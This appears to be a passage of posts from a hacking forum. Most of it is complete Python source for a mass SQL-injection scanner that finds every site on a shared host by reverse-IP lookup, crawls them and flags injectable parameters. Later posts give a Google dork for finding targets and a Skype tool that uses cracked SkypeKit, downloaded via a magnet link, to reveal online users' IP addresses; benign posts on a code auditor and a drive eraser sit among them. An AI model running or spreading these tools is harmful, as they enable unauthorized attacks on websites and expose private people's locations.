list. - If this option is not specified on command prompt, the script would perform reverse-IP lookup itself Script generates few more files during scanning which could be considered as log files, e.g. crawler output file, unique links parsed output file, reverse-IP lookup output file. Domain-SQLi-finder.py #!/usr/local/bin/python2.7 # This was written for a Penetration Test assessment and is for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing only! import chilkat, sys, os, argparse, httplib, urlparse, urllib2, re, time, datetime import DomainReverseIPLookUp # The following three variables get their values from command line args, either take user value or stick with the default ones pagesToCrawl = "" # Number of pages to crawl in a website maxVulInjectableParam = "" # Maximum number of vulnerable pages (parameters) to find output = "" # Output file name - append mode (a) reverseLookUp = "DSQLiReverseLookUp.txt" # Output file name for reverseIP lookup - write+ mode (w+) crawlDump = 'DSQLiCrawlerOutput.txt' # Stores crawling result for current crawl only - write+ mode (w+) uniqueLinksDump = 'DSQLiUniqueLinks.txt' # Stores crawling result for current scan only - write+ mode (w+) errorDump = 'DSQLiErrorDump.txt' # Dumps handled errors - append mode (a) sitesToScan = "" # Stores maximum number of sites to scan on domain in case of Mass-Mode Attack maxVulSites = "" # Stores maximum number of vulnerable sites to find with Mass-Mode Attack reverseFlag = 0 # Determines whether reverseLookUp file is generated by script or user supplies it maxVulSitesFlag = 0 # Keeps track of how many vulnerable sites have been found in Mass-Mode Attack verbose = 0 # Determines what messages to display on screen (0 or 1) sqlPayload = ["1'"] # SQL Payloads, add in more here sqlErrors = [ "Warning", "mysql_fetch_array()", "mysql_fetch_object()", "mysql_num_rows()", "mysql_free_result()", "mysql_real_escape_string()", "mysql_connect()", "mysql_select_db()", "mysql_query()", "You have an error in your SQL syntax", "Unclosed quotation mark after the character string", "Server Error in '/' Application", "Microsoft OLE DB Provider for ODBC Drivers error", "supplied argument is not a valid OCI8-Statement", "microsoft jet database engine" ] # add in more here # Determine platform and clear screen def clear_screen(): if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': os.system('clear') elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos': os.system('cls') else: pass # Banner - Set the formatting mororn, it's fucked up atm def banner(): print """ ################################################################## Domain SQLi Finder - (Error Based Tool-v0.1) b0nd@garage4hackers.com Greetz to: (www.garage4hackers.com) GGGGGG\ GG __GG\ GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\ GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\ GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee | GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____| \GGGGGG |\\aaaaaaa |rr | \\aaaaaaa |\ggggggg |\\eeeeeee\ \______/ \_______|\__| \_______| \____gg | \_______| gg\ gg | gggggg | \______/ ################################################################### """ print "\tUsage: python %s [options]" % sys.argv[0] print "\t\t-h help\n" call_exit() def call_exit(): print "\n\tExiting ...........\n" sys.exit(0) # Tests SQLi on all unique links and parameters by appending sqlPayload and checking the source def check_SQLi(uniqueUrls): sqliUrls = [] # This list will contain sorted URLs ready to be appended with sqlPayloads flag = 0 # Variable to check whether desired 'n' number of vulnerable pages have been found for link in uniqueUrls: # This list has all unique URLs but since a single unique URL might have multiple parameters num = link.count("=") # so this loop prepares URLs with one parameter each if num > 0: for x in xrange(num): x = x + 1 url = link.rsplit("=",x)[0]+"=" sqliUrls.append(url) sqliUrls = list(set(sqliUrls)) # By now this list has all injectable parameters ready to append sqlPayload parsed = urlparse.urlparse(link) # Later used to obtain website name now = datetime.datetime.now() # Current time of scanning to put in DSQLiResults output file try: fd_output = open(output, 'a') fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file except IOError: print "\n\t[!] Error - could not open|write file %s \n" % output if verbose == 1: print "\n[*] Testing SQLi on following URLs:" for link in sqliUrls: print "\t[-] URL: ", link else: print "\n[*] Testing SQLi on URL's ....." # In the following loop, the counter flag plays role to find 'n' number of vulnerable pages. If limited number of pages # have to be found, the value of flag counter determines whether script has found those number of pages or not. Once matches, # it breaks all loops and come out. Else, if it has not touched the limit but links in sqliUrls have finished, control comes # out of all loops. But if (0) i.e. all pages have to be found, flag plays no considerable role other than incrementing itself. for link in sqliUrls: for pload in sqlPayload: if verbose == 1: print "\n\n\tTesting: %s\n" % (link+pload) try: source = urllib2.urlopen(link+pload).read() # Appending sqlPayload and reading source for errors except urllib2.HTTPError, err: if err.code == 500: if verbose == 1: print "\t\t[!] Error - HTTP Error 500: Internal Server Error" print "\t\t[-] Continuing with next link" continue else: if verbose == 1: print "\t\t[!] Error - HTTP Error xxx" print "\t\t[-] Continuing with next link" continue for errors in sqlErrors: if re.search(errors, source) != None: # If any sql error found in source fd_output.write("\t\t[!] BINGO!!! SQLi Vulnerable " + link+pload + "\n") print "\n\t\t[!] BINGO!!! - SQLi FOUND in: %s (%s) \n" % (link+pload, errors) if maxVulInjectableParam != 0: # i.e. if 'n' number of vulnerable parameters have to be found if flag < maxVulInjectableParam: flag = flag + 1 else: break else: # i.e if all vulnerable pages have to be found flag = flag + 1 break else: if verbose == 1: print "\t\t[-] Not Vulnerable - String (%s) not found in response" % errors else: pass if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found break if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found break if flag != 0: print "\n\t[-] Target is vulnerable to SQLi, check log file" print "\t\t[-] %d injectable vulnerable parameters found" % (flag) global maxVulSitesFlag maxVulSitesFlag = maxVulSitesFlag + 1 # Increment the flag which determines how many vulnerable sites to find in case of Mass-Mode Attack else: print "\n\t[-] Target is not vulnerable to SQLi" try: fd_output.write("\t\tTarget is not vulnerable to SQLi attack\n") fd_output.close() # Close the file on completion of each URL, so that log file could be seen for except IOError: # result instantly, instead of waiting for whole script to finish print "\n\t[!] Error - file I/O error\n" try: fd_output.close() except IOError: pass # Just finds the unique URLs from all crawled URLs and saves to list # Concept is: Parse the URL, find its injectable parameter(s), check the combination of [netlock, path and injectable parameters] with earlier found # combinations, if unique, update our uniqueUrls list else goto next URL and parse it for same procedure def unique_urls(unsortedUrls): print "\n[*] Finding unique URL's ....." list_db = [] # Used as temporary storage to compare parameters with already found ones uniqueUrls = [] # This one will finally have unique URLs in it for link in unsortedUrls: list_tmp = [] # Temporary list to store query parameters only try: parsed = urlparse.urlparse(link) num = parsed.query.count("=") # Just checking the parsed.query portion for number of injectable parameters it has x = 0 for x in xrange(num): list_tmp.append(parsed.query.split("&")[x].rsplit("=",1)[0]) # list_tmp would have all injectable parameters in it as elements x = x + 1 except IndexError: # In my case links generate error bcoz they include an external URl and increase the number of "=" in link. # accordingly the loop run 1 extra time and generates out of index error if verbose == 1: print "\n\t[!] Error - List Index Out of Order - check %s and report to author" % (errorDump) try: fd_errorDump = open(errorDump, 'a') fd_errorDump.write("\n\t[*] Error occured inside unique_urls function for:\t" + parsed.query) except IOError: print "\n\t[!] Error - could not open|write file %s \n" % errorDump continue list_tmp = [parsed.netloc, parsed.path, list_tmp] if list_tmp in list_db: # For the first URL, this condition would definitely fail as list_db is empty continue # i.e. same parameters but with different values have been found, so continue else: list_db.append(list_tmp) # Update the found unique parameters uniqueUrls.append(link) # Update the List with unique complete URLs if verbose == 1: for link in uniqueUrls: print "\t[-] Unique link found: ", link try: fd_uniqueLinkDump = open(uniqueLinksDump, 'a') for link in uniqueUrls: fd_uniqueLinkDump.write(link + '\n') fd_uniqueLinkDump.close() except IOError: print "\n\t[!] Error - could not open|write file %s \n" % uniqueLinksDump check_SQLi(uniqueUrls) # Call SQLi check function to test SQLi vulnerability # Function crawls to find "linksToCrawl" number of pages from URL. # It stops when limit reaches or no more pages left to crawl, which ever meets the condition first def crawl_site(url): print "[*] Attacking URL -> ", url print "\t[*] Crawling %s to find injectable parameters" % url spider = chilkat.CkSpider() # Using Chilkat Library. Some modules are free. spider.Initialize(url) spider.AddUnspidered(url) spider.CrawlNext() print "\n\t[-] Website Title: ", spider.lastHtmlTitle() print "\n\t[-] Crawling Pages", # The trailing comma to show progress bar in case of non-verbose crawlerOutput = [] # This list would have all the linksToCrawl number of pages of URL for i in range(0,int(pagesToCrawl)): success = spider.CrawlNext() if (success == True): if verbose == 1: if i%50 == 0: print "\n[-] %d percent of %d pages to crawl complete\n" % ((i*100)/pagesToCrawl, pagesToCrawl) print "\t", spider.lastUrl() else: sys.stdout.flush() print ".", # In non verbose case, it prints dot dot dot to show the progress crawlerOutput.append(spider.lastUrl()) else: if (spider.get_NumUnspidered() == 0): print "\n\t[-] No more URLs to spider" i = i - 1 # Need to decrement, else gives +1 count for total pages crawled break else: print spider.lastErrorText() continue spider.SleepMs(10) try: fd_crawlDump = open(crawlDump, 'a') # Logs for link in crawlerOutput: fd_crawlDump.write(link + '\n') fd_crawlDump.close() except IOError: print "\n\t[!] Error - could not open|write file %s \n" % crawlDump print "\n\t[-] Crawled %d pages successfully" % (i+1) if verbose == 1: print "\n[*] Parsing URL's to collect links with '=' in them ....." urlsWithParameters = [] # This list would have only those URLs which has '=' in them i.e. injectable parameter(s) for link in crawlerOutput: if link.count("=") > 0: urlsWithParameters.append(link) if urlsWithParameters != []: if verbose == 1: print "\t[-] Done" unique_urls(urlsWithParameters) # Time to find unique URLs among all with '=' in them else: print "\n\t[!] No injectable parameter found" now = datetime.datetime.now() # Current time to put in DSQLiResults output file try: parsed = urlparse.urlparse(url) fd_output = open(output, 'a') fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file fd_output.write("\t\tNo injectable parameter found\n") fd_output.close() except IOError: print "\n\t[!] Error - could not open|write file %s \n" % output # Function tries to find SQLi on sites on shared hosting def attack_Domain(durl): sites = [] counter = 0 # This keeps check on how many sites have been scanned so far deadLinks = 0 # This keeps check on how many dead links have been found print "\n[*] Attacking Domain -> ", durl if reverseFlag == 0: # i.e. if --reverse switch is not used on console. That means, do reverseIP Lookup and generate result DomainReverseIPLookUp.generate_reverse_lookup(durl, reverseLookUp, verbose) # pass domain url, output file name and verbose level try: fd_reverseLookUp = open(reverseLookUp, 'r') for url in fd_reverseLookUp.readlines(): sites.append(url) # List sites contains all the domains hosted on server except IOError: print "\n\t[!] Error - %s file missing" % reverseLookUp print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website" call_exit() elif reverseFlag == 1: # i.e. if --reverse switch is mentioned, then don't do reverse IP Lookup and read data from already generated file try: fd_reverseLookUp = open(reverseLookUp, 'r') for url in fd_reverseLookUp.readlines(): sites.append(url) # List sites contains all the domains hosted on server except IOError: print "\n\t[!] Error - %s file missing" % reverseLookUp print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website" call_exit() if len(sites)%10 != 0: sites = sites[0:(len(sites)%10)] else: sites = sites[0:((len(sites)+2)%10)] for site in sites: try: print "\n\t#################################################" print "\n\t [-] Number of alive sites scanned so far: ", counter print "\n\t [-] Number of vulnerable sites found so far: ", maxVulSitesFlag print "\n\t [-] Number of dead sites found so far: ", deadLinks print "\n\t#################################################\n" if maxVulSites != 0: # i.e. if not all vulnerable sites are to be found if maxVulSitesFlag == maxVulSites: print "\n\t[-] Stopping scan - the required number of vulnerable sites have been found" break if site[:7] != "http://": # prepend http:// to url, if not already done by user site = "http://" + site # what about https site? site = site[:-1] # remove \n at the end of each element print "-"*80 print "\n[*] Target URL - %s ....." % (site) # Verify URL for its existance if verify_URL(site) == True: # Function call to verify URL for existance print "\t[-] URL Verified\n" crawl_site(site) # Pass the site to crawl function else: print "\n\t[-] URL %s could not be verified, continuing with next target in list" % site deadLinks = deadLinks + 1 continue except KeyboardInterrupt: decision = raw_input("\n\t[?] how do you want to proceed? [(C)ontinue with next target in list or (q)uit]: ") if decision == 'C' or decision == 'c': continue elif decision == 'q': print "\n[!] Error - user aborted" call_exit() else: print "\n\tEnjoy: oo=========> (|)" call_exit() counter = counter + 1 # Counting for only those sites which really got scanned # for those whose URLs couldn't be verified, not incrementing counter print "\n\n[*] Scanning Finished" print "\n\t[-] Total Number of vulnerable sites found in domain: ", maxVulSitesFlag print "\t[-] Check log file %s for result" % output # Function to verify URL is alive and accessible def verify_URL(url): good_codes = [httplib.OK, httplib.FOUND, httplib.MOVED_PERMANENTLY] # 200, 302, 301 respectively host, path = urlparse.urlparse(url)[1:3] # elems [1] and [2] - netloc and path try: conn = httplib.HTTPConnection(host) conn.request('HEAD', path) status = conn.getresponse().status conn.close() except StandardError: status = None return status in good_codes # Either 'True' or 'False' # Parse command line arguments, allowed combinations and mandatory values def parseArgs(): parser = argparse.ArgumentParser(description = 'Domain SQLi Finder - Error Based Tool v0.1', epilog="Report bugs to b0nd@garage4hackers.com | www.garage4hackers.com") parser.add_argument('--verbose', nargs='?', dest='verbose', default=0, help='set verbosity [0 (default) : Off | 1 : On]', type=int) parser.add_argument('--output', metavar='output.txt', dest='siteOutput', default='DSQLiResults.txt', help='output file to store results in (default=DSQLiResults.txt)') group1 = parser.add_argument_group('Single-Mode Attack: Target One Site on Domain') group1.add_argument('--url', nargs=1, dest='URL', help='target site to find SQLi') group1.add_argument('--crawl', nargs='?', dest='crawl', default=500, help='number of pages to crawl (default=500)', type=int) group1.add_argument('--pages', nargs='?', dest='pages', default=0, help='number of vulnerable pages (injectable parameters) to find in site (default=0 i.e. all)', type=int) # Mind it - In group1 and group2, same paramters "crawl" and "pages" are used. So on console whether uses --crawl or --dcrawl, # they would update the same variable "crawl" and ultimately the global variable pagesToCrawl. Same goes for "pages" group2 = parser.add_argument_group('Mass-Mode Attack: Target All Sites on Domain') group2.add_argument('--durl', nargs=1, dest='DURL', help='target domain to find SQLi') group2.add_argument('--sites', nargs='?', dest='sites', default=0, type=int, help='number of sites to scan on domain (default=0 i.e. all)') group2.add_argument('--vulsites', nargs='?', dest='vulsites', default=0, type=int, help='number of vulnerable sites to find on domain (default=0 i.e. all possible)') group2.add_argument('--dcrawl', nargs='?', dest='crawl', default=500, type=int, help='number of pages to crawl in each site (default=500)') group2.add_argument('--dpages', nargs='?', dest='pages', default=0, type=int, help='number of vulnerable pages (injectable parameters) to find in each site (default=0 i.e. all)') group2.add_argument('--reverse', metavar='output.txt', nargs=1, dest='reverseLookUp', help='output file to store found sites on server and|or read Reverse IP Lookup results from file') args = parser.parse_args() # Check exclusiveness of options if (args.URL != None and args.DURL != None): print "\n\t[!] Error - Mutually exclusive options (--url, --durl)" call_exit() # Check existance of at least one option if (args.URL == None and args.DURL == None): print "\n\t[!] Error - No mode selected (--url, --durl)" call_exit() # Check if value is passed to args. e.g. --crawl without value would pass "None" to it and program would crash # all of these switches have default value, so user either don't mention them on command prompt or must put a value for them if (args.crawl == None or args.pages == None or args.sites == None or args.vulsites == None): print "\n\t[!] Error - Insufficient number of value(s) passed to argument(s)" call_exit() # Check to make sure numeral value of vulsites is less than sites and pages < crawl if args.sites < args.vulsites: print "\n\t[!] Error - kidding? --sites shall be > --vulsites\n" call_exit() elif args.crawl < args.pages: print "\n\t[!] Error - kidding? --(d)crawl shall be > --(d)pages\n" call_exit() # Check if switch --reverse is used with --durl only if ((args.URL != None) and (args.reverseLookUp != None)): print "\n\t[!] Error - '--reverse' switch goes with Mass-Mode (--durl) attack only" call_exit() global reverseLookUp # Declaring it here as it's been used couple of times in this fuction # Check verbosity (--verbose argument) if args.verbose != None: # It would be none only when mentioned without any value i.e. --verbose <no value> if args.verbose == 1: # and if that is the case, the global value of verbose is 0 already, so - verbose off print "\n[*] Verbose Mode On" global verbose # verbose global variable verbose = 1 if args.URL != None: # Verbose mode for --url print "\t[-] Pages to crawl (default=500): ", (args.crawl) print "\t[-] Vulnerable injectable parameters (pages) to find in site (default=0 i.e. all): %d" % (args.pages) print "\t[-] Output file name: %s" % (args.siteOutput) if args.DURL != None: # Verbose mode for --durl print "\t[-] Number of sites to scan on domain (default=0 i.e all): ", (args.sites) print "\t[-] Number of vulnerable sites to find on domain (default=0 i.e. all possible): ", (args.vulsites) print "\t[-] Pages to crawl in each site (default=500): ", (args.crawl) print "\t[-] Vulnerable injectable parameters (pages) to find in each site (default=0 i.e. all): %d" % (args.pages) if args.reverseLookUp != None: # i.e. if on console the reverse.txt file names is mentioned print "\t[-] Reverse IP Look-up file needed to read domains from: %s" % (args.reverseLookUp[0]) else: print "\t[-] Reverse IP Look-up output file: %s" % reverseLookUp print "\t[-] Final result output file: %s" % (args.siteOutput) else: # i.e. if value 0 is passed to --verbose print "\n[*] Verbose Mode Off" else: # i.e. verbose has None Value, it's been passed without value print "\n[*] Vebose Mode Off (by default)" # By this point, either of --url, --durl or --aurl switch is enable # Following assignments are for --url, --durl - see if you wish to put only relevant one and take rest in if args.DURL != None # It's OK with current "common" crawl and pages parameters. If I assign parameter separately for --url and --durl then first I # would need to define "dcrawl" and "dpages" and use them in combination with --durl global pagesToCrawl pagesToCrawl = args.crawl global maxVulInjectableParam maxVulInjectableParam = args.pages global output output = args.siteOutput global sitesToScan sitesToScan = args.sites global maxVulSites maxVulSites = args.vulsites # Single-Mode Attack (--url argument) if args.URL != None: if args.URL[0][:7] != "http://": # prepend http:// to url, if not already done by user args.URL[0] = "http://"+args.URL[0] # what about https site? print "\n[*] Verifying URL....." # Verify URL for its existance if verify_URL(args.URL[0]) == True: # Function call to verify URL for existance print "\t[-] URL Verified\n" crawl_site(args.URL[0]) # Goto the function which deals with 1 URL else: print "\n\t[-] URL cound not be verified." call_exit() # Mass-Mode Attack (--durl argument) elif args.DURL != None: if args.DURL[0][:7] != "http://": args.DURL[0] = "http://"+args.DURL[0] # reverseLookUp doesn't have default value, so if not mentioned on console, it will be None. If not None, that means user wants to read reverse look-up # which is already generated file, either using this code or copied from somewhere. In that case, i/p file must reside in same directory if args.reverseLookUp != None: reverseLookUp = args.reverseLookUp[0] global reverseFlag # Determines whether reverseLookUp file is generated by script or user supplies it reverseFlag = 1 attack_Domain(args.DURL[0]) else: # i.e. --reverse is not mentioned on command prompt. Our code shall generate one. print "\n[*] Verifying Domain - %s ....." % (args.DURL[0]) if verify_URL(args.DURL[0]) == True: print "\t[-] Domain Verified\n" attack_Domain(args.DURL[0]) else: print "\n\t[-] Domain cound not be verified." call_exit() def main(): #clear_screen() if len(sys.argv) < 2: banner() parseArgs() # Parse command line arguments call_exit() # ---------------------------------------- Code execution starts here ------------------------------------- if __name__ == '__main__': try: main() except KeyboardInterrupt: print "\n[!] Error - user aborted" call_exit() DomainReverseIPLookUp.py #!/usr/local/bin/python2.7 # The objective of this script is to generate an output file with all the URLs found on shared hosting ('DSQLiReverseLookUp.txt' by default) # Shamelessly copied from http://hack-addict.blogspot.co.nz/2011/09/finding-domains-on-targeted-host.html. # Thanks and credit to the author import httplib, urllib, socket, sys from xml.dom.minidom import parse, parseString #reverseLookUp = 'DSQLiReverseLookUp.txt' def generate_reverse_lookup(domainURL, filename, verbose): print "\t[*] Performing Reverse IP Lookup to collect all domains hosted on same server....." if domainURL[:7] == "http://": domainURL = domainURL[7:] # print "\n inside generate_reverse_lookup function with args: ", domainURL AppId = '1734E2C92CA63FAA596335295B09CF1D0B5C6161' sites = [domainURL] ip = socket.gethostbyname(domainURL) offset = 50 while offset < 300: uri = "/xml.aspx?AppId=%s&Query=ip:%s&Sources=Web&Version=2.0&Market=en-us&Adult=Moderate&Options=EnableHighlighting&Web.Count=50&Web.Offset=%s&Web.Options=DisableQueryAlterations"%(AppId, ip, offset) conn = httplib.HTTPConnection("api.bing.net") conn.request("GET", uri) res = conn.getresponse() data = res.read() conn.close() xmldoc = parseString(data) nameEls = xmldoc.getElementsByTagName('web:DisplayUrl') for el in nameEls: temp = el.childNodes[0].nodeValue temp = temp.split("/")[0] if temp.find('www.') == -1: if temp not in sites: sites.append(temp) offset += 50 print "\n\t[-] Reverse IP Look Up successful" # print "\n\t[-] Number of domain(s) found: %d\n" % len(sites) try: fd_reverseLookUp = open(filename, 'w+') for site in sites: fd_reverseLookUp.write(site + '\n') if verbose == 1: print "\t\t", site print "\n\t[-] Number of domain(s) found: %d\n" % len(sites) fd_reverseLookUp.close() except IOError: print "\n\t[!] Error - could not open|write %s file", filename sys.exit(1) Download mirror: Domain-SQLi-finder.py.txt? DomainReverseIPLookUp.py.txt? chilkat library: Chilkat Python Module Source: Domain SQL Injector - Find SQL Injection on all sites hosted on server
  17. Part 1: Code your own Server/Client and start analyzing with Scapy Part1 (INTRO): In the Python part of video, we jump right into the code and cover your first Python TCP client and server and walk you through each of them, line by line. The Scapy part of the video will show you basic packet analysis in Scapy with a few helpful "making yourself feel at home in Scapy" tips. You will also walk out of this part with a better understanding of SYN/ACK/FIN packets, and what TCP connections and disconnects look like "on the wire". We also have a little surprise at the end The Source files (python 2.6) can be downloaded at: github.com/piman/PyPrimer-for-Hackers ------------ Some key points we want to cover in the whole video series: toolz often lie! code your own networking tools and get the correct feedback! code your own networking environments some network attacks run your toolz on several machines and communicate with them ...and other funny stuff Part 2 scr: python tutorial for hackers pentesters ? th3mast3r
  18. dork: inurl:.php?id= site:sitexxxxxxxx.com sau "Import sites"
  19. Download: Downloads - maxisploit-scanner - Scanner for SQL injection(error/blind) and XSS. Analysis Report for MaXIsploit.exe https://www.virustotal.com/file/f740429ae15d1ed571f4c23a7442c7f0e3f88678834c33a24d bd5d2bc91fbfa5/analysis/1335614595/ source: Maxisploit Scanner Demo
  20. Welcome to RATS - Rough Auditing Tool for Security RATS - Rough Auditing Tool for Security - is an open source tool developed and maintained by Secure Software security engineers. Secure Software was acquired by Fortify Software, Inc. RATS is a tool for scanning C, C++, Perl, PHP and Python source code and flagging common security related programming errors such as buffer overflows and TOCTOU (Time Of Check, Time Of Use) race conditions. RATS scanning tool provides a security analyst with a list of potential trouble spots on which to focus, along with describing the problem, and potentially suggest remedies. It also provides a relative assessment of the potential severity of each problem, to better help an auditor prioritize. This tool also performs some basic analysis to try to rule out conditions that are obviously not problems. As its name implies, the tool performs only a rough analysis of source code. It will not find every error and will also find things that are not errors. Manual inspection of your code is still necessary, but greatly aided with this tool. Download RATS RATS is free software. You may copy, distribute, and modify it under the terms of the GNU Public License. Latest Release: 2.3 Source tarball: rats-2.3.tar.gz [382K] [MD5] Win32 binary: rats-2.3-win32.zip [220K] [MD5] Requirements RATS requires expat to be installed in order to build and run. Expat is often installed in /usr/local/lib and /usr/local/include. On some systems, you will need to specify --with-expat-lib and --with-expat-include options to configure so that it can find your installation of the library and header. Expat can be found at: The Expat XML Parser Installation Building and installation of RATS is simple. To build, you simply need to run the configuration shell script in the distribution's top-level directory: ./configure The configuration script is a standard autoconf generation configuration script and accepts many options. Run configure with the --help option to see what options are available. Once the configuration script has completed successfully, simply run make in the distribution's top-level directory to build the program make By default, RATS will be installed to /usr/local/bin and its vulnerability database will be installed to /usr/local/lib. You may change the installation directories of both with the --prefix option to configure. You may optionally use the --bindir and --datadir to specify more precise locations for the files that are installed. To install after building, simply run make with the install target: make install This will copy the built binary, rats, to the binary installation directory and the vulnerability database, rats.xml, to the data installation directory. Running RATS Once you have built and installed RATS, it's time to start auditing your software! RATS accepts a few command line options that will be described here and accepts a list of files to audit on the command line. If no files to audit are specified, stdin will be used. Usage: rats [-d ] [-h] [-r] [-w ] ] [file1 file2 ... filen] Options explained: -d Specifies a vulnerability database to be loaded. You may have multiple -d options and each database specified will be loaded. -h Displays a brief usage summary -i Causes a list of function calls that were used which accept external input to be produced at the end of the vulnerability report. -l Force the specified language to be used regardless of filename extension. Currently valid language names are "c", "perl", "php" and "python". -r Causes references to vulnerable function calls that are not being used as calls themselves to be reported. -w Sets the warning level. Valid levels are 1, 2 or 3. Warning level 1 includes only default and high severity Level 2 includes medium severity. Level 2 is the default warning level 3 includes low severity vulnerabilities. -x Causes the default vulnerability databases (which are in the installation data directory, /usr/local/lib by default) to not be loaded. When started, RATS will scan each file specified on the command line and produce a report when scanning is complete. What vulnerabilities are reported in the final report depend on the data contained in the vulnerability database or databases that are used and the warning level in use. For each vulnerability, the list of files and line numbers where it occurred is given, followed by a brief description of the vulnerability and suggested action. https://www.fortify.com/ssa-elements/threat-intelligence/rats.html
  21. Most people know that simply deleting a file won't stop someone from downloading important data from your hard drive. Sure you could do a 35-pass Gutmann wipe or run a program such as Darik's Boot and Nuke, but if you really want to feel secure, you need to bring in the heavy artillery. Maker Wiebetech claims that its Drive eRazer Ultra will make your data disappear in a fashion that's good enough even for the Department of Defense (whatever that means), or you can use any of ten other modes if you think the DoD specs aren't good enough. Unlike the software-based solutions mentioned earlier, the Drive eRazer Ultra is a physical box that you connect directly to your SATA or IDE drive. Wiping runs at around seven gigabytes-per-minute, so it should make pretty quick work of your drive. Best of all, after it is completely erased, the drive can be reused just as if it were new. The cost of all this security? Just $274, or a lot more than the hard drive probably cost new. What the heck were you hiding on there anyway? Wiebetech, via dvice
  22. http://skype-ip-finder.tk/ source code: server.py print('****************************************************************************'); print('Skype IP lookup deamon'); print('****************************************************************************'); # This deamon listen unix socket for username string and then make RefreshProfile() for username. # If username online in Skypekit debug log will be string with IP adress. # # Put this script in skypekit-sdk_runtime-3.7.0/examples/python/tutorial and run there. # # You will need to launch the SkypeKit runtime before running this deamon. #---------------------------------------------------------------------------------- # Importing necessary libraries. Note that you will need to set the keyFileName value # in the keypair.py file. import sys; import socket import os, os.path import time import keypair; from time import sleep; sys.path.append(keypair.distroRoot + '/ipc/python'); sys.path.append(keypair.distroRoot + '/interfaces/skype/python'); try: import Skype; except ImportError: raise SystemExit('Program requires Skype and skypekit modules'); #---------------------------------------------------------------------------------- # Taking skypename and password arguments from command-line. if len(sys.argv) != 3: print('Usage: python vcard_socket.py <skypename> <password>'); sys.exit(); accountName = sys.argv[1]; accountPsw = sys.argv[2]; loggedIn = False; #---------------------------------------------------------------------------------- # Creating our main Skype object try: MySkype = Skype.GetSkype(keypair.keyFileName); MySkype.Start(); except Exception: raise SystemExit('Unable to create Skype instance'); #---------------------------------------------------------------------------------- # Defining our own Account property change callback and assigning it to the # Skype.Account class. def AccountOnChange (self, property_name): global loggedIn; if property_name == 'status': if self.status == 'LOGGED_IN': loggedIn = True; print('Login complete.'); Skype.Account.OnPropertyChange = AccountOnChange; #---------------------------------------------------------------------------------- # Defining our own Contact property change callback and assigning it to the # SkyLib.Contact class. def ContactOnPropertyChange(self, property_name): if property_name == 'availability': print('Online status event: ' + self.displayname + ' is now ' + self.availability); Skype.Contact.OnPropertyChange = ContactOnPropertyChange; #---------------------------------------------------------------------------------- # Retrieving account and logging in with it. account = MySkype.GetAccount(accountName); print('Logging in with ' + accountName); account.LoginWithPassword(accountPsw, False, False); while loggedIn == False: sleep(1); #---------------------------------------------------------------------------------- # Unix socket start if os.path.exists( "/tmp/skype_iplookup" ): os.remove( "/tmp/skype_iplookup" ) print "Opening socket..." MySocket = socket.socket( socket.AF_UNIX, socket.SOCK_DGRAM ) MySocket.bind("/tmp/skype_iplookup") os.chmod("/tmp/skype_iplookup", stat.S_IRWXU | stat.S_IRGRP | stat.S_IRWXO) print "OK. Now listening..." #---------------------------------------------------------------------------------- # Main cycle. # while True: MyUsername = MySocket.recv( 1024 ) if not MyUsername: break else: print ('Looking for ' + MyUsername + '...') # Be aware, string will put in MySkype.GetContact(MyUsername).RefreshProfile() without any verification of input data # string with illegal characters and "echo123" can broke whole programm. MySkype.GetContact(MyUsername).RefreshProfile() print ('Maybe done.') client.py # -*- coding: utf-8 -*- import socket import os, os.path import sys import re import time #------------------------------------------------------------------------ # Put here path to debug log that is currently written by skypekit runtime # you need run "skypekit -d logname" before edit this # also you can parse log by youself like "tail -F /some/folder/logname | grep -a noticing" and use client.py only for send username into socket PathToLog = "/some/folder/logname" if len(sys.argv) == 1: print('Usage: python skyip.py <skypename>') sys.exit(); Username = sys.argv[1] if os.path.exists( "/tmp/skype_iplookup" ): client = socket.socket( socket.AF_UNIX, socket.SOCK_DGRAM ) client.connect( "/tmp/skype_iplookup" ) client.send(Username) client.close() time.sleep(3) File = open(PathToLog,'rb').readlines() finds = [] for matches in File: finded = re.findall('.*noticing.{0}.0.*-r(.*?)-l(.*?:[0-9]*?)[^0-9].*'.format(Username), matches) if len(finded)>0: finds.append('%s - %s'%(finded[0][0],finded[0][1])) finds = list(set(finds)) for f in finds: print f else: print "Can't connect to unix socket /tmp/skype_iplookup" README.md Skype-iplookup Perform obscure ip lookup for online skype account. Can find local and remote ip address. Based on deobfuscated Skypekit runtime that write clear debug log. How to use? First of all you need cracked Skypekit. magnet:?xt=urn:btih:3da068082f6ec70be379d4046e4c77bc4578f751&dn=SkypeKit_sdk%2Bruntimes_370_412.zip&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.publicbt.com%3A80&tr=udp%3A%2F%2Ftracker.ccc.de%3A80 This runtime also don't need certificate from Skype LTD to use it. You can made your own skype client/plugin and share sources without proprietary Skypekit. Run Skypekit ./skypekit-sdk_runtime-3.7.0/bin/linux-x86/RUNTIME_linux-x86-skypekit-voicertp-videortp_3.7.0 -x -m -d logname Put server.py in ./skypekit-sdk_runtime-3.7.0/examples/python/tutorial/ and run it python2.6.5 ./server.py username password Be aware to login with your main account! Edit path to log file in client.py and try it. https://github.com/zhovner/Skype-iplookup/ via: http://board.protecus.de/t42182.htm
  23. ctrl a/ctrl c/ ctrl v
×
×
  • Create New...